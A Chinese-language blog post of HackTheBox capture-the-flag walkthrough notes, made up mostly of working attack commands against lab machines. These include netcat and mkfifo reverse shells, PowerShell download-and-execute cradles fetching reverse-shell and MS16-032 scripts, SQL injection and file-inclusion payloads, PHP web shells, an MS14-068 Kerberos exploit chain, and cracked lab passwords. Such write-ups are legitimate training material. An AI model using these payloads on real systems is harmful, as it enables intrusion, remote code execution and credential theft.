hackthebox通关手记（持续更新）

简介：

花了点时间弄了几道题目。以前我是用windows渗透居多，在kali linux下渗透测试一直不怎么习惯。通过这几天做这些题目感觉顺手多了。有些题目脑洞也比较大，感觉很多也不适合于实际的环境

10.10.10.5

这题比较简单，ftp可以匿名登录并且可以put文件：anonymous，上传一句话或者是大马即可
期间有一个问题就是：大马下的shell不能type root.txt
我只好上传nc反弹才成功,反弹常用端口53，443。
C:\inetpub\wwwroot\nc.exe -e cmd.exe 10.10.xx.xx 443
Nc -lvvp 443

10.10.10.6

上传torrent，编辑图片上传test.php.png 利用菜刀上传到/tmp
Python back.py 10.10.14.22 1234
Nc -lvvp 1234
上传exp执行成功 cat root

10.10.10.7
elastaix 2.2本地文件包含漏洞
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action
hydra 破解收集到的用户密码

10.10.10.8
HFS远程代码执行漏洞

tcpdump -I tun0
远程执行ps1脚本
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.22:8000/’)

Sublime Invoke-PowerShellTcp.ps1

/?search==%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1').}

nc -lvvp 1337
发现 存在的漏洞：
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1')
执行ms16032并加载shelltcp.ps1
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-MS16032.ps1')

nc -lvvp 1338

10.10.10.9

Drupal（水滴）cms漏洞利用远程代码执行

Apt-get install php7.2-curl  需要装2018.2的kali，不然就是需要升级。我发现php7木有合适的php-curl模块
Php exploit.php。需要把php自己修改一下。 修改成一句话木马即可，毕竟国人我还是适应用菜刀。sad

update-alternatives --config java     更换一下java就可以使用knife了

10.10.10.10
这个漏洞挺有意思的。
Wpscan 枚举到用户名takis

steghide extract -sf HackerAccessGranted.jpg 会导出id_rsa

ssh2john id_rsa > id_john
john id_john --wordlist=password.txt

ssh I id_rsa takis@10.10.10.10
superpassword
sudo /bin/fuckin bash

10.10.10.16
octobercms 扫目录backend 用户名密码：admin:admin 上传php5

迎合国际风格，实验环境直接用<?php echo system($_REQUEST['cmd']);?>

10.10.10.22

需要设置hosts
vi /etc/hosts

10.10.10.24
这题何有意思
curl直接下载

python -m SimpleHTTPServer

http://10.10.10.24/uploads/sec.php?sec=nc -e /bin/sh 10.10.14.22 8088

python3 -c 'import pty; pty.spawn("/bin/bash")'

10.10.10.31
在忘记密码处可以注入

a@b.c' uniOn select 1,2,3,concat(__username_,"@example.com") FROM supercms.operators limit 1,1 -- -
a@b.c' uniOn select 1,2,3,concat(__password_,"@example.com") FROM supercms.operators limit 1,1 -- -
super_cms_adm
tamarro

反弹shell，其实不反弹也可以

sec=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f=

Pip install gmpy2 出错

apt-cache search libmpfr
find /usr -type f -name "libmpfr.s*"
ln -sf /usr/lib/x86_64-linux-gnu/libmpfr.so.6.0.1 /usr/lib/libmpfr.so.4

解决在此：https://blog.csdn.net/wanzt123/article/details/71036184?locationNum=8&fps=1

python RsaCtfTool.py --publickey /root/Desktop/crypt/decoder.pub --uncipherfile /root/Desktop/crypt/pass.crypt

nevermindthebollocks

supershell ‘/bin/ls$(cat /root/root.txt)’

10.10.10.37

在plugins目录下面有个jar，可以利用jd-gui反编译出MySQL的用户名和密码。

public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

phpmyadmin 一般有两种知道web路径导出shell、通过日志拿shell或者破解密码进入wp在后台getshell

利用密码猜解notch用户密码都是MySQL的密码

10.10.10.47

Donkey:d0nk3y1337!

import seccure
second = "\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa\"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec<K-gp9\xa0\xcb\xac\x9et\x89z\x13\x15\x94Dn\xeb\x95\x19[\x80\xf1\xa8,\x82G`\xee\xe8C\xc1\x15\xa1~T\x07\xcc{\xbd\xda\xf0\x9e\x1bh\'QU\xe7\x163\xd4F\xcc\xc5\x99w"
print seccure.decrypt(second, "PrinceCharming")
Sec shr3k1sb3st!

touch — — reference=thoughts.txt

10.10.10.48

比较有意思，树莓派系统pi-hole 系统是Raspbian，有个默认账户密码：pi：raspberry用ssh登陆cat user.txt

Sudo -i 可以切换到root权限cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Sudo strings /dev/sdb即可

10.10.10.52

Sa m$$ql_S@_P@ssW0rd!
james@htb.local james J@m3s_P@ssW0rd!

git clone impacket

apt-get install krb5-user cifs-utils rdate
sublime /etc/hosts
10.10.10.52 mantis.htb.local mantis

sublime /etc/krb5.conf

[libdefaults]
default_realm = HTB.LOCAL

[realms]
HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = HTB.LOCAL
}
[domain_realm]
.domain.internal = HTB.LOCAL
domain.internal = HTB.LOCAL

rdate -n 10.10.10.52

kinit james

rpcclient -U james 10.10.10.52

lookupnames james
S-1-5-21-4220043660-4019079961-2895681657-1103

python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis

cp TGT_james@HTB.LOCAL.ccache /tmp/krb5cc_0
J@m3s_P@ssW0rd!

cd impacket
python setup.py install

python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local

10.10.10.60

/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+"<%3fphp+%40eval(base64_decode('ZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsg'))%3b%3f>">wup.php

Wup.php?cmd=cat /root/root.txt

10.10.10.65

sslyze --regular 10.10.10.65
Imagetrick

10.10.10.63
Jenkins为授权访问

http://10.10.10.63:50000/askjeeves/script